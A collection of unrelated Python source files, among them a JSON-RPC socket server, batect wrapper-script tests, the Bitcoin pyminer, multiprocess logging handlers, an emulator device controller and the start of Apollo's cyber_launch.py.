p0 = multiprocessing.Process(group=None, target=self.task, name=None, args=(0, number_of_nodes, parent_pipes), kwargs={}, daemon=None)
processes.append(p0)
p0.start()
# Give the other nodes the other ends, and start them processing.
for i in range(1, number_of_nodes):
p = multiprocessing.Process(group=None, target=self.task, name=None, args=(i, number_of_nodes, child_pipes), kwargs={}, daemon=None)
processes.append(p)
p.start()
# Wait for all processes to finish before exiting.
for p in processes:
p.join()
if __name__ == "__main__":
Model().main()
|
socketserver.py
|
"""
Copyright (c) 2006 Jan-Klaas Kollhof
This file is part of jsonrpc.
jsonrpc is free software; you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation; either version 2.1 of the License, or
(at your option) any later version.
This software is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with this software; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""
from jsonrpc import SimpleServiceHandler
import socket
from threading import Thread
class SocketServiceHandler(SimpleServiceHandler):
def __init__(self, socket, service, messageDelimiter=""):
self.socket = socket
SimpleServiceHandler.__init__(self, service, messageDelimiter=messageDelimiter)
def receiveForever(self):
while 1:
try:
data = self.socket.recv(1024)
except:
data = None
if not data:
if self.socket:
self.close()
return
else:
self.handlePartialData(data)
def send(self, data):
self.socket.send(data)
def close(self):
SimpleServiceHandler.close(self)
if self.socket:
try:
self.socket.shutdown(socket.SHUT_RDWR)
self.socket = None
except:
pass
class TCPServiceServer:
def __init__(self, service, ConnectionHandler = SocketServiceHandler, messageDelimiter=""):
self.service = service
self.ConnectionHandler = ConnectionHandler
self.messageDelimiter=messageDelimiter
def serve(self, address):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.bind(address)
self.socket.listen(5)
print "serving", self.socket
while 1:
(conn,addr) = self.socket.accept()
self.acceptConnection(conn)
def acceptConnection(self, conn):
self.handleConnection(conn)
def handleConnection(self, conn):
self.ConnectionHandler(conn, self.service, messageDelimiter=self.messageDelimiter).receiveForever()
class ThreadingMixin:
def acceptConnection(self, conn):
t = Thread(target=self.handleConnection, args=(conn,))
t.setDaemon(True)
t.start()
class ThreadedTCPServiceServer(ThreadingMixin, TCPServiceServer):
pass
|
tests.py
|
#! /usr/bin/env python3
import http.server
import os
import shutil
import socket
import subprocess
import tempfile
import threading
import unittest
class WrapperScriptTests(unittest.TestCase):
http_port = 8080
default_download_url = "http://localhost:" + str(http_port) + "/test/testapp.jar"
minimum_script_dependencies = [
"/usr/bin/bash",
"/usr/bin/basename",
"/usr/bin/dirname",
"/usr/bin/grep",
"/usr/bin/head",
"/usr/bin/mkdir",
"/usr/bin/mktemp",
"/usr/bin/mv",
"/usr/bin/sed",
]
def setUp(self):
self.start_server()
self.cache_dir = tempfile.mkdtemp()
def tearDown(self):
self.stop_server()
shutil.rmtree(self.cache_dir)
def test_first_run(self):
result = self.run_script(["arg 1", "arg 2"])
output = result.stdout.decode()
self.assertIn("Downloading batect", output)
self.assertIn("BATECT_WRAPPER_SCRIPT_DIR is: {}\n".format(self.get_script_dir()), output)
self.assertIn("BATECT_WRAPPER_CACHE_DIR is: {}\n".format(self.cache_dir), output)
self.assertIn("HOSTNAME is: {}\n".format(socket.gethostname()), output)
self.assertIn("I received 2 arguments.\narg 1\narg 2\n", output)
self.assertEqual(result.returncode, 0)
def test_second_run(self):
first_result = self.run_script(["arg 1", "arg 2"])
first_output = first_result.stdout.decode()
self.assertIn("Downloading batect", first_output)
self.assertIn("BATECT_WRAPPER_SCRIPT_DIR is: {}\n".format(self.get_script_dir()), first_output)
self.assertIn("BATECT_WRAPPER_CACHE_DIR is: {}\n".format(self.cache_dir), first_output)
self.assertIn("HOSTNAME is: {}\n".format(socket.gethostname()), first_output)
self.assertIn("I received 2 arguments.\narg 1\narg 2\n", first_output)
self.assertEqual(first_result.returncode, 0)
second_result = self.run_script(["arg 3", "arg 4"])
second_output = second_result.stdout.decode()
self.assertNotIn("Downloading batect", second_output)
self.assertIn("BATECT_WRAPPER_SCRIPT_DIR is: {}\n".format(self.get_script_dir()), second_output)
self.assertIn("BATECT_WRAPPER_CACHE_DIR is: {}\n".format(self.cache_dir), second_output)
self.assertIn("HOSTNAME is: {}\n".format(socket.gethostname()), second_output)
self.assertIn("I received 2 arguments.\narg 3\narg 4\n", second_output)
self.assertEqual(first_result.returncode, 0)
def test_download_fails(self):
result = self.run_script(["arg 1", "arg 2"], download_url=self.default_download_url + "-does-not-exist")
self.assertIn("Downloading batect", result.stdout.decode())
self.assertIn("404 File not found", result.stdout.decode())
self.assertNotEqual(result.returncode, 0)
def test_download_is_not_quiet(self):
result = self.run_script([], download_url=self.default_download_url, quiet_download="false")
result_output = result.stdout.decode()
self.assertIn("Downloading batect", result_output)
self.assertIn("BATECT_WRAPPER_SCRIPT_DIR is: {}\n".format(self.get_script_dir()), result_output)
self.assertIn("BATECT_WRAPPER_CACHE_DIR is: {}\n".format(self.cache_dir), result_output)
self.assertIn("HOSTNAME is: {}\n".format(socket.gethostname()), result_output)
self.assertIn("#", result_output)
self.assertEqual(result.returncode, 0)
def test_download_is_quiet(self):
result = self.run_script([], download_url=self.default_download_url, quiet_download="true")
result_output = result.stdout.decode()
self.assertIn("Downloading batect", result_output)
self.assertIn("BATECT_WRAPPER_SCRIPT_DIR is: {}\n".format(self.get_script_dir()), result_output)
self.assertIn("BATECT_WRAPPER_CACHE_DIR is: {}\n".format(self.cache_dir), result_output)
self.assertIn("HOSTNAME is: {}\n".format(socket.gethostname()), result_output)
self.assertNotIn("#", result_output)
self.assertEqual(result.returncode, 0)
def test_no_curl(self):
path_dir = self.create_limited_path(self.minimum_script_dependencies)
result = self.run_script([], path=path_dir)
self.assertIn("curl is not installed or not on your PATH. Please install it and try again.", result.stdout.decode())
self.assertNotEqual(result.returncode, 0)
def test_no_java(self):
path_dir = self.create_limited_path(self.minimum_script_dependencies + ["/usr/bin/curl"])
result = self.run_script([], path=path_dir)
self.assertIn("Java is not installed or not on your PATH. Please install it and try again.", result.stdout.decode())
self.assertNotEqual(result.returncode, 0)
def test_unsupported_java(self):
path_dir = self.create_limited_path_for_specific_java_version("7")
result = self.run_script([], path=path_dir)
self.assertIn("The version of Java that is available on your PATH is version 1.7, but version 1.8 or greater is required.\n" +
"If you have a newer version of Java installed, please make sure your PATH is set correctly.", result.stdout.decode())
self.assertNotEqual(result.returncode, 0)
def test_supported_java(self):
for version in ["8", "9", "10", "11"]:
with self.subTest(java_version=version):
path_dir = self.create_limited_path_for_specific_java_version(version)
result = self.run_script([], path=path_dir)
self.assertIn("The Java application has started.", result.stdout.decode())
self.assertEqual(result.returncode, 0)
def test_supported_java_with_tool_options_set(self):
path_dir = self.create_limited_path_for_specific_java_version("8")
result = self.run_script([], path=path_dir, with_java_tool_options="true")
self.assertIn("The Java application has started.", result.stdout.decode())
self.assertEqual(result.returncode, 0)
def test_non_zero_exit(self):
result = self.run_script(["exit-non-zero"])
output = result.stdout.decode()
self.assertIn("The Java application has started.", output)
self.assertNotIn("WARNING: you should never see this", output)
self.assertEqual(result.returncode, 123)
def create_limited_path_for_specific_java_version(self, java_version):
return self.create_limited_path(self.minimum_script_dependencies +
[
"/usr/bin/curl",
"/usr/lib/jvm/java-{}-openjdk-amd64/bin/java".format(java_version),
])
def create_limited_path(self, executables):
path_dir = tempfile.mkdtemp()
self.addCleanup(lambda: shutil.rmtree(path_dir))
for executable in executables:
base_name = os.path.basename(executable)
os.symlink(executable, os.path.join(path_dir, base_name))
return path_dir
def run_script(self, args, download_url=default_download_url, path=os.environ["PATH"], quiet_download=None, with_java_tool_options=None):
env = {
"BATECT_CACHE_DIR": self.cache_dir,
"BATECT_DOWNLOAD_URL": download_url,
"PATH": path
}
if quiet_download is not None:
env["BATECT_QUIET_DOWNLOAD"] = quiet_download
if with_java_tool_options is not None:
env["JAVA_TOOL_OPTIONS"] = "-XX:+UnlockExperimentalVMOptions -XX:+UseCGroupMemoryLimitForHeap"
path = self.get_script_path()
command = [path] + args
return subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=env)
def get_script_dir(self):
return os.path.abspath(os.path.join(os.path.dirname(os.path.realpath(__file__)), "..", "src"))
def get_script_path(self):
return os.path.join(self.get_script_dir(), "template.sh")
def start_server(self):
self.server = http.server.HTTPServer(("", self.http_port), QuietHTTPHandler)
threading.Thread(target=self.server.serve_forever, daemon=True).start()
def stop_server(self):
self.server.shutdown()
self.server.server_close()
class QuietHTTPHandler(http.server.SimpleHTTPRequestHandler):
def log_message(self, format, *args):
pass
if __name__ == '__main__':
unittest.main()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 2334
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
handlers.py
|
# coding: utf-8
from operator import attrgetter
import multiprocessing
import threading
import logging
import sys
import traceback
from getpass import getpass
import smtplib
import email.utils
from email.message import EmailMessage
from logging import StreamHandler, ERROR, LogRecord
from logging.handlers import SMTPHandler, MemoryHandler, RotatingFileHandler
from .config import validate_log_level_int
class BufferingSMTPHandler(MemoryHandler):
def __init__(
self,
capacity,
mailhost,
toaddrs,
subject=None,
flushLevel=ERROR,
*,
credentials=None,
fromaddr=None,
secure=None,
mailport=None,
timeout=5.0
):
flushLevel = validate_log_level_int(flushLevel)
if isinstance(credentials, str):
credentials = (
credentials,
getpass("Please enter a password for {}: ".format(credentials)),
)
if fromaddr is None:
if not isinstance(credentials, (list, tuple)) or len(credentials) != 2:
raise ValueError(
"you must supply either fromaddr or credentials=(uername, password); "
"fromaddr is None but credentials = {}".format(credentials)
)
fromaddr = credentials[0]
if isinstance(toaddrs, str):
toaddrs = [toaddrs]
elif not toaddrs:
raise ValueError(
"you must supply toaddrs, either a single email address or a list thereof"
)
if mailport is not None:
# SMTPHandler uses a tuple for this
mailhost = (mailhost, mailport)
elif not isinstance(mailhost, (list, tuple)) or len(mailhost) != 2:
raise ValueError(
"If mailport is not explicitly passed, mailhost must be a (host, port) tuple; got {}".format(
mailhost
)
)
MemoryHandler.__init__(self, capacity, flushLevel=flushLevel)
SMTPHandler.__init__(
self,
mailhost=mailhost,
fromaddr=fromaddr,
toaddrs=toaddrs,
subject=subject,
credentials=credentials,
secure=secure,
timeout=timeout,
)
def send_mail(self, content, subject=None):
msg = EmailMessage()
msg["From"] = self.fromaddr
msg["To"] = ",".join(self.toaddrs)
subject = subject or self.subject
if subject is not None:
msg["Subject"] = subject
msg["Date"] = email.utils.localtime()
msg.set_content(content)
port = self.mailport or smtplib.SMTP_PORT
smtp = smtplib.SMTP(self.mailhost, port, timeout=self.timeout)
try:
if self.username:
if self.secure is not None:
smtp.ehlo()
smtp.starttls(*self.secure)
smtp.ehlo()
smtp.login(self.username, self.password)
smtp.send_message(msg)
finally:
smtp.quit()
def get_content(self):
return "\n".join(map(self.format, self.buffer))
def get_subject(self):
if self.subject:
return self.subject
top_record = max(self.buffer, key=attrgetter("levelno"))
top_records = [r for r in self.buffer if r.levelno >= top_record.levelno]
names = sorted(set(r.name for r in top_records))
return "{} messages from loggers {}".format(
top_record.levelname, ", ".join(names)
)
def flush(self):
if len(self.buffer) > 0:
content = self.get_content()
subject = self.get_subject()
try:
self.send_mail(content, subject)
except:
self.handleError(
LogRecord(
self.name,
self.level,
pathname=None,
lineno=None,
msg=content,
args=(),
exc_info=sys.exc_info(),
)
) # no particular record
finally:
self.buffer = []
def __del__(self):
self.flush()
class MultiProcHandler(logging.Handler):
"""
Adapted from zzzeek's answer at:
https://stackoverflow.com/questions/641420/how-should-i-log-while-using-multiprocessing-in-python
Tweaked and subclassed here - added the get_subhandler() method for generality.
"""
subhandler_cls = None
def __init__(self, *args, **kwargs):
logging.Handler.__init__(self)
self._handler = self.get_subhandler(*args, **kwargs)
self.queue = multiprocessing.Queue(-1)
t = threading.Thread(target=self.receive, daemon=True)
t.start()
def get_subhandler(self, *args, **kwargs):
return self.subhandler_cls(*args, **kwargs)
def setFormatter(self, fmt):
logging.Handler.setFormatter(self, fmt)
self._handler.setFormatter(fmt)
def receive(self):
while True:
try:
record = self.queue.get()
self._handler.emit(record)
except (KeyboardInterrupt, SystemExit):
raise
except EOFError:
break
except:
traceback.print_exc(file=sys.stderr)
def send(self, s):
self.queue.put_nowait(s)
def _format_record(self, record):
# ensure that exc_info and args
# have been stringified. Removes any chance of
# unpickleable things inside and possibly reduces
# message size sent over the pipe
if record.args:
record.msg = record.msg % record.args
record.args = None
if record.exc_info:
dummy = self.format(record)
record.exc_info = None
return record
def emit(self, record):
try:
s = self._format_record(record)
self.send(s)
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
def close(self):
self._handler.close()
logging.Handler.close(self)
def __del__(self):
self.close()
class MultiProcRotatingFileHandler(MultiProcHandler):
subhandler_cls = RotatingFileHandler
def __init__(self, filename, mode="a", maxBytes=2 ** 20, backupCount=0):
super().__init__(filename, mode, maxBytes, backupCount)
class MultiProcStreamHandler(MultiProcHandler):
subhandler_cls = StreamHandler
def __init__(self, stream):
super().__init__(stream)
class MultiProcBufferingSMTPHandler(MultiProcHandler):
subhandler_cls = BufferingSMTPHandler
def __init__(
self,
capacity,
mailhost,
toaddrs,
subject=None,
flushLevel=ERROR,
*,
credentials=None,
fromaddr=None,
secure=None,
mailport=None,
timeout=5.0
):
super().__init__(
capacity=capacity,
mailhost=mailhost,
toaddrs=toaddrs,
subject=subject,
flushLevel=flushLevel,
credentials=credentials,
fromaddr=fromaddr,
secure=secure,
mailport=mailport,
timeout=timeout,
)
|
device_controller.py
|
'''
Device Controller to handle devices
'''
import json
import logging
import queue
import threading
from http import HTTPStatus
import requests
from utils import utils
from utils.errors import AldebaranError, ArchitectureError
from utils.utils import GenericRequestHandler, GenericServer
from hardware.memory.memory import SegfaultError
logger = logging.getLogger('hardware.device_controller')
class DeviceController:
'''
Device Controller
'''
def __init__(self, host, port, system_addresses, system_interrupts, ioports):
self.system_addresses = system_addresses
self.system_interrupts = system_interrupts
self._device_registry = [0] * system_addresses['device_registry_size']
self._device_status_table = [0] * system_addresses['device_status_table_size']
self.output_queue = queue.Queue()
self._stop_event = threading.Event()
self._server = GenericServer((host, port), GenericRequestHandler, None, self._handle_incoming_request)
self._input_thread = threading.Thread(target=self._server.serve_forever)
self._output_thread = threading.Thread(target=self._output_thread_run)
self._ping_thread = threading.Thread(target=self._ping_thread_run)
self.ioports = ioports
self.interrupt_controller = None
self.architecture_registered = False
def register_architecture(self, interrupt_controller):
'''
Register other internal devices
'''
self.interrupt_controller = interrupt_controller
for ioport in self.ioports:
ioport.register_architecture(self)
self.architecture_registered = True
def start(self):
'''
Start input, output and ping threads
'''
if not self.architecture_registered:
raise ArchitectureError('Device Controller cannot run without registering architecture')
logger.info('Starting...')
self._input_thread.start()
self._output_thread.start()
self._ping_thread.start()
logger.info('Started.')
def stop(self):
'''
Stop input, output and ping threads
'''
logger.info('Stopping...')
self._server.shutdown()
self._server.server_close()
self._input_thread.join()
self._stop_event.set()
self._output_thread.join()
self._ping_thread.join()
logger.info('Stopped.')
def read_byte(self, pos, silent=False):
'''
Read byte from device registry or device status table
'''
if self.system_addresses['device_registry_address'] <= pos < self.system_addresses['device_registry_address'] + self.system_addresses['device_registry_size']:
value = self._device_registry[pos - self.system_addresses['device_registry_address']]
elif self.system_addresses['device_status_table_address'] <= pos < self.system_addresses['device_status_table_address'] + self.system_addresses['device_status_table_size']:
value = self._device_status_table[pos - self.system_addresses['device_status_table_address']]
else:
raise SegfaultError('Segmentation fault when trying to read byte at {}'.format(utils.word_to_str(pos)))
if not silent:
logger.debug('Read byte %s from %s.', utils.byte_to_str(value), utils.word_to_str(pos))
return value
def write_byte(self, pos, value, silent=False):
'''
Cannot write to device registry device status table
'''
raise SegfaultError('Segmentation fault when trying to write byte at {}'.format(utils.word_to_str(pos)))
def read_word(self, pos, silent=False):
'''
Read word from device registry or device status table
'''
if self.system_addresses['device_registry_address'] <= pos < self.system_addresses['device_registry_address'] + self.system_addresses['device_registry_size'] - 1:
relative_pos = pos - self.system_addresses['device_registry_address']
value = (self._device_registry[relative_pos] << 8) + self._device_registry[relative_pos + 1]
elif self.system_addresses['device_status_table_address'] <= pos < self.system_addresses['device_status_table_address'] + self.system_addresses['device_status_table_size'] - 1:
relative_pos = pos - self.system_addresses['device_status_table_address']
value = (self._device_status_table[relative_pos] << 8) + self._device_status_table[relative_pos + 1]
else:
raise SegfaultError('Segmentation fault when trying to read word at {}'.format(utils.word_to_str(pos)))
if not silent:
logger.debug('Read word %s from %s.', utils.word_to_str(value), utils.word_to_str(pos))
return value
def write_word(self, pos, value, silent=False):
'''
Cannot write to device registry device status table
'''
raise SegfaultError('Segmentation fault when trying to write word at {}'.format(utils.word_to_str(pos)))
def _set_device_status(self, ioport_number, status):
if status < 0:
status = 0
if status > 255:
status = 255
changed = status != self._device_status_table[ioport_number]
self._device_status_table[ioport_number] = status
if changed:
self.interrupt_controller.send(self.system_interrupts['device_status_changed'][ioport_number])
def _output_thread_run(self):
while True:
try:
ioport_number, device_host, device_port, command, data = self.output_queue.get(timeout=0.1)
except queue.Empty:
if self._stop_event.wait(0):
break
continue
logger.debug('Command "%s" from IOPort %s', command, ioport_number)
if command == 'data':
response = self._send_request(device_host, device_port, 'data', data)
if response.status_code != 200:
raise DeviceError('Could not send data: {}'.format(response.text))
logger.debug('[Device] %s', response.json()['message'])
else:
logger.error('Unknown command')
def _ping_thread_run(self):
ping_period = 1 # sec
while True:
for ioport in self.ioports:
if ioport.registered:
self._check_and_update_device_status(ioport)
if self._stop_event.wait(ping_period):
break
def _check_and_update_device_status(self, ioport):
ponged = self._ping_device(ioport)
if ponged:
ping_message = 'ponged'
else:
ping_message = 'did not pong'
logger.debug(
'Device[%s:%s] @ IOPort[%s] %s.',
ioport.device_host, ioport.device_port,
ioport.ioport_number,
ping_message,
)
if ponged:
new_status = 0
else:
new_status = self._device_status_table[ioport.ioport_number] + 1
self._set_device_status(ioport.ioport_number, new_status)
def _ping_device(self, ioport):
try:
response = self._send_request(ioport.device_host, ioport.device_port, 'ping')
if response.status_code != 200:
raise DeviceError('Device did not pong.')
except DeviceControllerError:
return False
return True
def _send_request(self, device_host, device_port, command, data=None, content_type='application/octet-stream'):
if data is None:
data = b''
try:
response = requests.post(
'http://{}:{}/{}'.format(
device_host,
device_port,
command,
),
data=data,
headers={'Content-Type': content_type},
)
except requests.exceptions.ConnectionError:
raise DeviceControllerConnectionError('Could not connect to Aldebaran.')
logger.debug('Request sent.')
return response
def _handle_incoming_request(self, path, headers, rfile):
'''
Handle incoming request from devices, called by GenericRequestHandler
'''
max_ioport_number = len(self.ioports) - 1
path = path.lstrip('/')
if '/' not in path:
return (
HTTPStatus.BAD_REQUEST,
{
'error': 'Path must be /ioport/command',
}
)
ioport_number, command = path.split('/', 1)
try:
ioport_number = int(ioport_number)
if ioport_number < 0:
raise ValueError()
if ioport_number > max_ioport_number:
raise ValueError()
except ValueError:
return (
HTTPStatus.BAD_REQUEST,
{
'error': 'IOPort number must be an integer between 0 and {}.'.format(max_ioport_number),
}
)
try:
request_body_length = int(headers.get('Content-Length'))
except TypeError:
return (HTTPStatus.LENGTH_REQUIRED, None)
data = rfile.read(request_body_length)
return self._handle_input(ioport_number, command, data)
def _handle_input(self, ioport_number, command, data):
'''
Handle command from device
'''
logger.debug('Incoming command "%s" to IOPort %s', command, ioport_number)
if command == 'register':
return self._register_device(ioport_number, data)
if command == 'unregister':
return self._unregister_device(ioport_number)
if command == 'ping':
return (
HTTPStatus.OK,
{
'message': 'pong',
}
)
if command == 'data':
return self._send_data_to_ioport(ioport_number, data)
return (
HTTPStatus.BAD_REQUEST,
{
'error': 'Unknown command: {}'.format(command),
}
)
def _send_data_to_ioport(self, ioport_number, data):
if not self.ioports[ioport_number].registered:
logger.info('No device is registered to IOPort %s.', ioport_number)
return (
HTTPStatus.FORBIDDEN,
{
'error': 'No device is registered to this IOPort.',
}
)
if len(data) > self.ioports[ioport_number].input_buffer_size:
logger.info('Too much data sent to IOPort %s.', ioport_number)
return (
HTTPStatus.FORBIDDEN,
{
'error': 'Too much data sent.',
}
)
self.ioports[ioport_number].input_queue.put(data)
logger.info('Delivered data to IOPort %s.', ioport_number)
self.interrupt_controller.send(self.system_interrupts['ioport_in'][ioport_number])
return (
HTTPStatus.OK,
{
'message': 'Received data: {}'.format(utils.binary_to_str(data)),
}
)
def _register_device(self, ioport_number, data):
try:
data = json.loads(data)
except json.decoder.JSONDecodeError:
return (
HTTPStatus.BAD_REQUEST,
{
'error': 'Could not parse data.',
}
)
for field_name in {'type', 'id', 'host', 'port'}:
if field_name not in data:
return (
HTTPStatus.BAD_REQUEST,
{
'error': 'Field "{}" missing.'.format(field_name),
}
)
try:
device_type = int(data['type'], 16)
if device_type < 0x00 or device_type > 0xFF:
raise ValueError()
except ValueError:
return (
HTTPStatus.BAD_REQUEST,
{
'error': 'Device type must be a 1-byte hex number.',
}
)
try:
device_id = int(data['id'], 16)
if device_id < 0x00 or device_id > 0xFFFFFF:
raise ValueError()
device_id = list(device_id.to_bytes(3, 'big'))
except ValueError:
return (
HTTPStatus.BAD_REQUEST,
{
'error': 'Device ID must be a 1-byte hex number.',
}
)
device_host, device_port = data['host'], data['port']
if self.ioports[ioport_number].registered:
logger.info('A device is already registered to IOPort %s.', ioport_number)
return (
HTTPStatus.FORBIDDEN,
{
'error': 'A device is already registered to this IOPort.',
}
)
if self.ioports[ioport_number].input_queue.qsize() > 0:
logger.info('IOPort %s input queue not empty.', ioport_number)
return (
HTTPStatus.FORBIDDEN,
{
'error': 'IOPort input queue not empty.',
}
)
logger.info('Registering device to IOPort %s...', ioport_number)
logger.info(
'Device type and ID: %s %s',
utils.byte_to_str(device_type),
' '.join(utils.byte_to_str(device_id[i]) for i in range(3)),
)
logger.info('Device host and port: %s:%s', device_host, device_port)
self._device_registry[4 * ioport_number] = device_type
for idx in range(3):
self._device_registry[4 * ioport_number + 1 + idx] = device_id[idx]
self._set_device_status(ioport_number, 0)
self.ioports[ioport_number].register_device(device_host, device_port)
self.interrupt_controller.send(self.system_interrupts['device_registered'])
logger.info('Device registered to IOPort %s.', ioport_number)
return (
HTTPStatus.OK,
{
'message': 'Device registered.',
}
)
def _unregister_device(self, ioport_number):
if not self.ioports[ioport_number].registered:
logger.info('No device is registered to IOPort %s.', ioport_number)
return (
HTTPStatus.FORBIDDEN,
{
'error': 'No device is registered to this IOPort.',
}
)
logger.info('Unregistering device from IOPort %s...', ioport_number)
for idx in range(4):
self._device_registry[4 * ioport_number + idx] = 0
self._set_device_status(ioport_number, 0)
self.ioports[ioport_number].unregister_device()
self.interrupt_controller.send(self.system_interrupts['device_unregistered'])
logger.info('Device unregistered from IOPort %s.', ioport_number)
return (
HTTPStatus.OK,
{
'message': 'Device unregistered.',
}
)
# pylint: disable=missing-docstring
class DeviceControllerError(AldebaranError):
pass
class DeviceControllerConnectionError(DeviceControllerError):
pass
class DeviceError(DeviceControllerError):
pass
|
cyber_launch.py
|
#!/usr/bin/env python3
# ****************************************************************************
# Copyright 2018 The Apollo Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ****************************************************************************
import argparse
import atexit
import logging
import os
import os.path
import signal
import subprocess
import sys
import time
import threading
import traceback
import xml.etree.ElementTree as ET
g_binary_name = 'mainboard'
g_pwd = os.getcwd()
g_script_name = os.path.basename(sys.argv[0]).split(".")[0]
g_process_pid = os.getpid()
g_process_name = g_script_name + "_" + str(g_process_pid)
cyber_path = os.getenv('CYBER_PATH')
"""
colorful logging
"""
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = list(range(8))
RESET_SEQ = "\033[0m"
